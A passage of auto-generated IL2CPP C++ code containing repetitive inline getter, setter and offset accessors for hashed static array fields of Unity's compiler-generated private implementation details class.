get_offset_of_U395C48758CAE1715783472FB073AB158AB8A0AB2A_78() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___95C48758CAE1715783472FB073AB158AB8A0AB2A_78)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U395C48758CAE1715783472FB073AB158AB8A0AB2A_78() const { return ___95C48758CAE1715783472FB073AB158AB8A0AB2A_78; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U395C48758CAE1715783472FB073AB158AB8A0AB2A_78() { return &___95C48758CAE1715783472FB073AB158AB8A0AB2A_78; } inline void set_U395C48758CAE1715783472FB073AB158AB8A0AB2A_78(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___95C48758CAE1715783472FB073AB158AB8A0AB2A_78 = value; } inline static int32_t get_offset_of_U3973417296623D8DC6961B09664E54039E44CA5D8_79() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___973417296623D8DC6961B09664E54039E44CA5D8_79)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_U3973417296623D8DC6961B09664E54039E44CA5D8_79() const { return ___973417296623D8DC6961B09664E54039E44CA5D8_79; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_U3973417296623D8DC6961B09664E54039E44CA5D8_79() { return &___973417296623D8DC6961B09664E54039E44CA5D8_79; } inline void set_U3973417296623D8DC6961B09664E54039E44CA5D8_79(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___973417296623D8DC6961B09664E54039E44CA5D8_79 = value; } inline static int32_t get_offset_of_U397FB30C84FF4A41CD4625B44B2940BFC8DB43003_80() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___97FB30C84FF4A41CD4625B44B2940BFC8DB43003_80)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_U397FB30C84FF4A41CD4625B44B2940BFC8DB43003_80() const { return ___97FB30C84FF4A41CD4625B44B2940BFC8DB43003_80; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_U397FB30C84FF4A41CD4625B44B2940BFC8DB43003_80() { return &___97FB30C84FF4A41CD4625B44B2940BFC8DB43003_80; } inline void set_U397FB30C84FF4A41CD4625B44B2940BFC8DB43003_80(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___97FB30C84FF4A41CD4625B44B2940BFC8DB43003_80 = value; } inline static int32_t get_offset_of_U39A9C3962CD4753376E3507C8CB5FD8FCC4B4EDB5_81() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___9A9C3962CD4753376E3507C8CB5FD8FCC4B4EDB5_81)); } inline __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 get_U39A9C3962CD4753376E3507C8CB5FD8FCC4B4EDB5_81() const { return ___9A9C3962CD4753376E3507C8CB5FD8FCC4B4EDB5_81; } inline __StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 * get_address_of_U39A9C3962CD4753376E3507C8CB5FD8FCC4B4EDB5_81() { return &___9A9C3962CD4753376E3507C8CB5FD8FCC4B4EDB5_81; } inline void set_U39A9C3962CD4753376E3507C8CB5FD8FCC4B4EDB5_81(__StaticArrayInitTypeSizeU3D64_tC44517F575DC9AEC7589A864FEA072030961DAF6 value) { ___9A9C3962CD4753376E3507C8CB5FD8FCC4B4EDB5_81 = value; } inline static int32_t get_offset_of_U39BB00D1FCCBAF03165447FC8028E7CA07CA9FE88_82() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___9BB00D1FCCBAF03165447FC8028E7CA07CA9FE88_82)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_U39BB00D1FCCBAF03165447FC8028E7CA07CA9FE88_82() const { return ___9BB00D1FCCBAF03165447FC8028E7CA07CA9FE88_82; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_U39BB00D1FCCBAF03165447FC8028E7CA07CA9FE88_82() { return &___9BB00D1FCCBAF03165447FC8028E7CA07CA9FE88_82; } inline void set_U39BB00D1FCCBAF03165447FC8028E7CA07CA9FE88_82(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___9BB00D1FCCBAF03165447FC8028E7CA07CA9FE88_82 = value; } inline static int32_t get_offset_of_A0074C15377C0C870B055927403EA9FA7A349D12_83() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___A0074C15377C0C870B055927403EA9FA7A349D12_83)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_A0074C15377C0C870B055927403EA9FA7A349D12_83() const { return ___A0074C15377C0C870B055927403EA9FA7A349D12_83; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_A0074C15377C0C870B055927403EA9FA7A349D12_83() { return &___A0074C15377C0C870B055927403EA9FA7A349D12_83; } inline void set_A0074C15377C0C870B055927403EA9FA7A349D12_83(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___A0074C15377C0C870B055927403EA9FA7A349D12_83 = value; } inline static int32_t get_offset_of_A1319B706116AB2C6D44483F60A7D0ACEA543396_84() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___A1319B706116AB2C6D44483F60A7D0ACEA543396_84)); } inline __StaticArrayInitTypeSizeU3D130_t732A6F42953325ADC5746FF1A652A2974473AF4F get_A1319B706116AB2C6D44483F60A7D0ACEA543396_84() const { return ___A1319B706116AB2C6D44483F60A7D0ACEA543396_84; } inline __StaticArrayInitTypeSizeU3D130_t732A6F42953325ADC5746FF1A652A2974473AF4F * get_address_of_A1319B706116AB2C6D44483F60A7D0ACEA543396_84() { return &___A1319B706116AB2C6D44483F60A7D0ACEA543396_84; } inline void set_A1319B706116AB2C6D44483F60A7D0ACEA543396_84(__StaticArrayInitTypeSizeU3D130_t732A6F42953325ADC5746FF1A652A2974473AF4F value) { ___A1319B706116AB2C6D44483F60A7D0ACEA543396_84 = value; } inline static int32_t get_offset_of_A13AA52274D951A18029131A8DDECF76B569A15D_85() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___A13AA52274D951A18029131A8DDECF76B569A15D_85)); } inline int64_t get_A13AA52274D951A18029131A8DDECF76B569A15D_85() const { return ___A13AA52274D951A18029131A8DDECF76B569A15D_85; } inline int64_t* get_address_of_A13AA52274D951A18029131A8DDECF76B569A15D_85() { return &___A13AA52274D951A18029131A8DDECF76B569A15D_85; } inline void set_A13AA52274D951A18029131A8DDECF76B569A15D_85(int64_t value) { ___A13AA52274D951A18029131A8DDECF76B569A15D_85 = value; } inline static int32_t get_offset_of_A323DB0813C4D072957BA6FDA79D9776674CD06B_86() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___A323DB0813C4D072957BA6FDA79D9776674CD06B_86)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_A323DB0813C4D072957BA6FDA79D9776674CD06B_86() const { return ___A323DB0813C4D072957BA6FDA79D9776674CD06B_86; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_A323DB0813C4D072957BA6FDA79D9776674CD06B_86() { return &___A323DB0813C4D072957BA6FDA79D9776674CD06B_86; } inline void set_A323DB0813C4D072957BA6FDA79D9776674CD06B_86(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___A323DB0813C4D072957BA6FDA79D9776674CD06B_86 = value; } inline static int32_t get_offset_of_A5444763673307F6828C748D4B9708CFC02B0959_87() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___A5444763673307F6828C748D4B9708CFC02B0959_87)); } inline __StaticArrayInitTypeSizeU3D212_tDFB9BEA11D871D109F9E6502B2F50F7115451AAF get_A5444763673307F6828C748D4B9708CFC02B0959_87() const { return ___A5444763673307F6828C748D4B9708CFC02B0959_87; } inline __StaticArrayInitTypeSizeU3D212_tDFB9BEA11D871D109F9E6502B2F50F7115451AAF * get_address_of_A5444763673307F6828C748D4B9708CFC02B0959_87() { return &___A5444763673307F6828C748D4B9708CFC02B0959_87; } inline void set_A5444763673307F6828C748D4B9708CFC02B0959_87(__StaticArrayInitTypeSizeU3D212_tDFB9BEA11D871D109F9E6502B2F50F7115451AAF value) { ___A5444763673307F6828C748D4B9708CFC02B0959_87 = value; } inline static int32_t get_offset_of_A6732F8E7FC23766AB329B492D6BF82E3B33233F_88() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___A6732F8E7FC23766AB329B492D6BF82E3B33233F_88)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_A6732F8E7FC23766AB329B492D6BF82E3B33233F_88() const { return ___A6732F8E7FC23766AB329B492D6BF82E3B33233F_88; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_A6732F8E7FC23766AB329B492D6BF82E3B33233F_88() { return &___A6732F8E7FC23766AB329B492D6BF82E3B33233F_88; } inline void set_A6732F8E7FC23766AB329B492D6BF82E3B33233F_88(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___A6732F8E7FC23766AB329B492D6BF82E3B33233F_88 = value; } inline static int32_t get_offset_of_A705A106D95282BD15E13EEA6B0AF583FF786D83_89() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___A705A106D95282BD15E13EEA6B0AF583FF786D83_89)); } inline __StaticArrayInitTypeSizeU3D174_t58EBFEBC3E6F34CF7C54ED51E8113E34B876351F get_A705A106D95282BD15E13EEA6B0AF583FF786D83_89() const { return ___A705A106D95282BD15E13EEA6B0AF583FF786D83_89; } inline __StaticArrayInitTypeSizeU3D174_t58EBFEBC3E6F34CF7C54ED51E8113E34B876351F * get_address_of_A705A106D95282BD15E13EEA6B0AF583FF786D83_89() { return &___A705A106D95282BD15E13EEA6B0AF583FF786D83_89; } inline void set_A705A106D95282BD15E13EEA6B0AF583FF786D83_89(__StaticArrayInitTypeSizeU3D174_t58EBFEBC3E6F34CF7C54ED51E8113E34B876351F value) { ___A705A106D95282BD15E13EEA6B0AF583FF786D83_89 = value; } inline static int32_t get_offset_of_A8A491E4CED49AE0027560476C10D933CE70C8DF_90() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___A8A491E4CED49AE0027560476C10D933CE70C8DF_90)); } inline __StaticArrayInitTypeSizeU3D1018_t7825BE1556EFF874DAFDC230EB69C85A48DBCBC4 get_A8A491E4CED49AE0027560476C10D933CE70C8DF_90() const { return ___A8A491E4CED49AE0027560476C10D933CE70C8DF_90; } inline __StaticArrayInitTypeSizeU3D1018_t7825BE1556EFF874DAFDC230EB69C85A48DBCBC4 * get_address_of_A8A491E4CED49AE0027560476C10D933CE70C8DF_90() { return &___A8A491E4CED49AE0027560476C10D933CE70C8DF_90; } inline void set_A8A491E4CED49AE0027560476C10D933CE70C8DF_90(__StaticArrayInitTypeSizeU3D1018_t7825BE1556EFF874DAFDC230EB69C85A48DBCBC4 value) { ___A8A491E4CED49AE0027560476C10D933CE70C8DF_90 = value; } inline static int32_t get_offset_of_AC791C4F39504D1184B73478943D0636258DA7B1_91() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___AC791C4F39504D1184B73478943D0636258DA7B1_91)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_AC791C4F39504D1184B73478943D0636258DA7B1_91() const { return ___AC791C4F39504D1184B73478943D0636258DA7B1_91; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_AC791C4F39504D1184B73478943D0636258DA7B1_91() { return &___AC791C4F39504D1184B73478943D0636258DA7B1_91; } inline void set_AC791C4F39504D1184B73478943D0636258DA7B1_91(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___AC791C4F39504D1184B73478943D0636258DA7B1_91 = value; } inline static int32_t get_offset_of_AFCD4E1211233E99373A3367B23105A3D624B1F2_92() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___AFCD4E1211233E99373A3367B23105A3D624B1F2_92)); } inline __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A get_AFCD4E1211233E99373A3367B23105A3D624B1F2_92() const { return ___AFCD4E1211233E99373A3367B23105A3D624B1F2_92; } inline __StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A * get_address_of_AFCD4E1211233E99373A3367B23105A3D624B1F2_92() { return &___AFCD4E1211233E99373A3367B23105A3D624B1F2_92; } inline void set_AFCD4E1211233E99373A3367B23105A3D624B1F2_92(__StaticArrayInitTypeSizeU3D52_tF7B918A088A367994FBAEB73123296D8929B543A value) { ___AFCD4E1211233E99373A3367B23105A3D624B1F2_92 = value; } inline static int32_t get_offset_of_B472ED77CB3B2A66D49D179F1EE2081B70A6AB61_93() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___B472ED77CB3B2A66D49D179F1EE2081B70A6AB61_93)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_B472ED77CB3B2A66D49D179F1EE2081B70A6AB61_93() const { return ___B472ED77CB3B2A66D49D179F1EE2081B70A6AB61_93; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_B472ED77CB3B2A66D49D179F1EE2081B70A6AB61_93() { return &___B472ED77CB3B2A66D49D179F1EE2081B70A6AB61_93; } inline void set_B472ED77CB3B2A66D49D179F1EE2081B70A6AB61_93(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___B472ED77CB3B2A66D49D179F1EE2081B70A6AB61_93 = value; } inline static int32_t get_offset_of_B4FBD02AAB5B16E0F4BD858DA5D9E348F3CE501D_94() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___B4FBD02AAB5B16E0F4BD858DA5D9E348F3CE501D_94)); } inline __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 get_B4FBD02AAB5B16E0F4BD858DA5D9E348F3CE501D_94() const { return ___B4FBD02AAB5B16E0F4BD858DA5D9E348F3CE501D_94; } inline __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 * get_address_of_B4FBD02AAB5B16E0F4BD858DA5D9E348F3CE501D_94() { return &___B4FBD02AAB5B16E0F4BD858DA5D9E348F3CE501D_94; } inline void set_B4FBD02AAB5B16E0F4BD858DA5D9E348F3CE501D_94(__StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 value) { ___B4FBD02AAB5B16E0F4BD858DA5D9E348F3CE501D_94 = value; } inline static int32_t get_offset_of_B53A2C6DF21FC88B17AEFC40EB895B8D63210CDF_95() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___B53A2C6DF21FC88B17AEFC40EB895B8D63210CDF_95)); } inline __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F get_B53A2C6DF21FC88B17AEFC40EB895B8D63210CDF_95() const { return ___B53A2C6DF21FC88B17AEFC40EB895B8D63210CDF_95; } inline __StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F * get_address_of_B53A2C6DF21FC88B17AEFC40EB895B8D63210CDF_95() { return &___B53A2C6DF21FC88B17AEFC40EB895B8D63210CDF_95; } inline void set_B53A2C6DF21FC88B17AEFC40EB895B8D63210CDF_95(__StaticArrayInitTypeSizeU3D256_t9003B1E1E8C82BC25ADE7407C58A314C292B326F value) { ___B53A2C6DF21FC88B17AEFC40EB895B8D63210CDF_95 = value; } inline static int32_t get_offset_of_B881DA88BE0B68D8A6B6B6893822586B8B2CFC45_96() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___B881DA88BE0B68D8A6B6B6893822586B8B2CFC45_96)); } inline __StaticArrayInitTypeSizeU3D998_t8A5C9782706B510180A1B9C9F7E96F8F48421B8C get_B881DA88BE0B68D8A6B6B6893822586B8B2CFC45_96() const { return ___B881DA88BE0B68D8A6B6B6893822586B8B2CFC45_96; } inline __StaticArrayInitTypeSizeU3D998_t8A5C9782706B510180A1B9C9F7E96F8F48421B8C * get_address_of_B881DA88BE0B68D8A6B6B6893822586B8B2CFC45_96() { return &___B881DA88BE0B68D8A6B6B6893822586B8B2CFC45_96; } inline void set_B881DA88BE0B68D8A6B6B6893822586B8B2CFC45_96(__StaticArrayInitTypeSizeU3D998_t8A5C9782706B510180A1B9C9F7E96F8F48421B8C value) { ___B881DA88BE0B68D8A6B6B6893822586B8B2CFC45_96 = value; } inline static int32_t get_offset_of_B8864ACB9DD69E3D42151513C840AAE270BF21C8_97() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___B8864ACB9DD69E3D42151513C840AAE270BF21C8_97)); } inline __StaticArrayInitTypeSizeU3D162_tFFF125F871C6A7DE42BE37AC907E2E2149A861AA get_B8864ACB9DD69E3D42151513C840AAE270BF21C8_97() const { return ___B8864ACB9DD69E3D42151513C840AAE270BF21C8_97; } inline __StaticArrayInitTypeSizeU3D162_tFFF125F871C6A7DE42BE37AC907E2E2149A861AA * get_address_of_B8864ACB9DD69E3D42151513C840AAE270BF21C8_97() { return &___B8864ACB9DD69E3D42151513C840AAE270BF21C8_97; } inline void set_B8864ACB9DD69E3D42151513C840AAE270BF21C8_97(__StaticArrayInitTypeSizeU3D162_tFFF125F871C6A7DE42BE37AC907E2E2149A861AA value) { ___B8864ACB9DD69E3D42151513C840AAE270BF21C8_97 = value; } inline static int32_t get_offset_of_B8F87834C3597B2EEF22BA6D3A392CC925636401_98() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___B8F87834C3597B2EEF22BA6D3A392CC925636401_98)); } inline __StaticArrayInitTypeSizeU3D360_tFF8371303424DEBAE608051BAA970E5AFB409DF7 get_B8F87834C3597B2EEF22BA6D3A392CC925636401_98() const { return ___B8F87834C3597B2EEF22BA6D3A392CC925636401_98; } inline __StaticArrayInitTypeSizeU3D360_tFF8371303424DEBAE608051BAA970E5AFB409DF7 * get_address_of_B8F87834C3597B2EEF22BA6D3A392CC925636401_98() { return &___B8F87834C3597B2EEF22BA6D3A392CC925636401_98; } inline void set_B8F87834C3597B2EEF22BA6D3A392CC925636401_98(__StaticArrayInitTypeSizeU3D360_tFF8371303424DEBAE608051BAA970E5AFB409DF7 value) { ___B8F87834C3597B2EEF22BA6D3A392CC925636401_98 = value; } inline static int32_t get_offset_of_B9B670F134A59FB1107AF01A9FE8F8E3980B3093_99() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___B9B670F134A59FB1107AF01A9FE8F8E3980B3093_99)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_B9B670F134A59FB1107AF01A9FE8F8E3980B3093_99() const { return ___B9B670F134A59FB1107AF01A9FE8F8E3980B3093_99; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_B9B670F134A59FB1107AF01A9FE8F8E3980B3093_99() { return &___B9B670F134A59FB1107AF01A9FE8F8E3980B3093_99; } inline void set_B9B670F134A59FB1107AF01A9FE8F8E3980B3093_99(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___B9B670F134A59FB1107AF01A9FE8F8E3980B3093_99 = value; } inline static int32_t get_offset_of_BE1BDEC0AA74B4DCB079943E70528096CCA985F8_100() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___BE1BDEC0AA74B4DCB079943E70528096CCA985F8_100)); } inline __StaticArrayInitTypeSizeU3D20_t4B48985ED9F1499360D72CB311F3EB54FB7C4B63 get_BE1BDEC0AA74B4DCB079943E70528096CCA985F8_100() const { return ___BE1BDEC0AA74B4DCB079943E70528096CCA985F8_100; } inline __StaticArrayInitTypeSizeU3D20_t4B48985ED9F1499360D72CB311F3EB54FB7C4B63 * get_address_of_BE1BDEC0AA74B4DCB079943E70528096CCA985F8_100() { return &___BE1BDEC0AA74B4DCB079943E70528096CCA985F8_100; } inline void set_BE1BDEC0AA74B4DCB079943E70528096CCA985F8_100(__StaticArrayInitTypeSizeU3D20_t4B48985ED9F1499360D72CB311F3EB54FB7C4B63 value) { ___BE1BDEC0AA74B4DCB079943E70528096CCA985F8_100 = value; } inline static int32_t get_offset_of_BEBC9ECC660A13EFC359BA3383411F698CFF25DB_101() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___BEBC9ECC660A13EFC359BA3383411F698CFF25DB_101)); } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 get_BEBC9ECC660A13EFC359BA3383411F698CFF25DB_101() const { return ___BEBC9ECC660A13EFC359BA3383411F698CFF25DB_101; } inline __StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 * get_address_of_BEBC9ECC660A13EFC359BA3383411F698CFF25DB_101() { return &___BEBC9ECC660A13EFC359BA3383411F698CFF25DB_101; } inline void set_BEBC9ECC660A13EFC359BA3383411F698CFF25DB_101(__StaticArrayInitTypeSizeU3D72_tF9B2DE61B68289FA0233B6E305B08B2FCD612FA1 value) { ___BEBC9ECC660A13EFC359BA3383411F698CFF25DB_101 = value; } inline static int32_t get_offset_of_BEE1CFE5DFAA408E14CE4AF4DCD824FA2E42DCB7_102() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___BEE1CFE5DFAA408E14CE4AF4DCD824FA2E42DCB7_102)); } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 get_BEE1CFE5DFAA408E14CE4AF4DCD824FA2E42DCB7_102() const { return ___BEE1CFE5DFAA408E14CE4AF4DCD824FA2E42DCB7_102; } inline __StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 * get_address_of_BEE1CFE5DFAA408E14CE4AF4DCD824FA2E42DCB7_102() { return &___BEE1CFE5DFAA408E14CE4AF4DCD824FA2E42DCB7_102; } inline void set_BEE1CFE5DFAA408E14CE4AF4DCD824FA2E42DCB7_102(__StaticArrayInitTypeSizeU3D40_t0453B23B081EF301CB1E3167001650AD0C490F04 value) { ___BEE1CFE5DFAA408E14CE4AF4DCD824FA2E42DCB7_102 = value; } inline static int32_t get_offset_of_BF477463CE2F5EF38FC4C644BBBF4DF109E7670A_103() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___BF477463CE2F5EF38FC4C644BBBF4DF109E7670A_103)); } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E get_BF477463CE2F5EF38FC4C644BBBF4DF109E7670A_103() const { return ___BF477463CE2F5EF38FC4C644BBBF4DF109E7670A_103; } inline __StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E * get_address_of_BF477463CE2F5EF38FC4C644BBBF4DF109E7670A_103() { return &___BF477463CE2F5EF38FC4C644BBBF4DF109E7670A_103; } inline void set_BF477463CE2F5EF38FC4C644BBBF4DF109E7670A_103(__StaticArrayInitTypeSizeU3D3_t651350E6AC00D0836A5D0539D0D68852BE81E08E value) { ___BF477463CE2F5EF38FC4C644BBBF4DF109E7670A_103 = value; } inline static int32_t get_offset_of_BF5EB60806ECB74EE484105DD9D6F463BF994867_104() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___BF5EB60806ECB74EE484105DD9D6F463BF994867_104)); } inline __StaticArrayInitTypeSizeU3D6_tC937DCE458F6AE4186120B4DDF95463176C75C78 get_BF5EB60806ECB74EE484105DD9D6F463BF994867_104() const { return ___BF5EB60806ECB74EE484105DD9D6F463BF994867_104; } inline __StaticArrayInitTypeSizeU3D6_tC937DCE458F6AE4186120B4DDF95463176C75C78 * get_address_of_BF5EB60806ECB74EE484105DD9D6F463BF994867_104() { return &___BF5EB60806ECB74EE484105DD9D6F463BF994867_104; } inline void set_BF5EB60806ECB74EE484105DD9D6F463BF994867_104(__StaticArrayInitTypeSizeU3D6_tC937DCE458F6AE4186120B4DDF95463176C75C78 value) { ___BF5EB60806ECB74EE484105DD9D6F463BF994867_104 = value; } inline static int32_t get_offset_of_C1A1100642BA9685B30A84D97348484E14AA1865_105() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___C1A1100642BA9685B30A84D97348484E14AA1865_105)); } inline int64_t get_C1A1100642BA9685B30A84D97348484E14AA1865_105() const { return ___C1A1100642BA9685B30A84D97348484E14AA1865_105; } inline int64_t* get_address_of_C1A1100642BA9685B30A84D97348484E14AA1865_105() { return &___C1A1100642BA9685B30A84D97348484E14AA1865_105; } inline void set_C1A1100642BA9685B30A84D97348484E14AA1865_105(int64_t value) { ___C1A1100642BA9685B30A84D97348484E14AA1865_105 = value; } inline static int32_t get_offset_of_C6F364A0AD934EFED8909446C215752E565D77C1_106() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___C6F364A0AD934EFED8909446C215752E565D77C1_106)); } inline __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 get_C6F364A0AD934EFED8909446C215752E565D77C1_106() const { return ___C6F364A0AD934EFED8909446C215752E565D77C1_106; } inline __StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 * get_address_of_C6F364A0AD934EFED8909446C215752E565D77C1_106() { return &___C6F364A0AD934EFED8909446C215752E565D77C1_106; } inline void set_C6F364A0AD934EFED8909446C215752E565D77C1_106(__StaticArrayInitTypeSizeU3D16_t35B2E1DB11C9D3150BF800DC30A2808C4F1A1341 value) { ___C6F364A0AD934EFED8909446C215752E565D77C1_106 = value; } inline static int32_t get_offset_of_CE5835130F5277F63D716FC9115526B0AC68FFAD_107() { return static_cast<int32_t>(offsetof(U3CPrivateImplementationDetailsU3E_t5BA0C21499B7A4F7CBCB87805E61EF52DF22771A_StaticFields, ___CE5835130F5277F63D716FC9115526B0AC68FFAD_107)); } inline __StaticArrayInitTypeSizeU3D174_t58EBFEBC3E6F34CF7C54ED51E8113E34B876351F get_CE5835130F5277F63D716FC9115526B0AC68FFAD_107() const { return ___CE5835130F5277F63D716FC9115526B0AC68FFAD_107; } inline 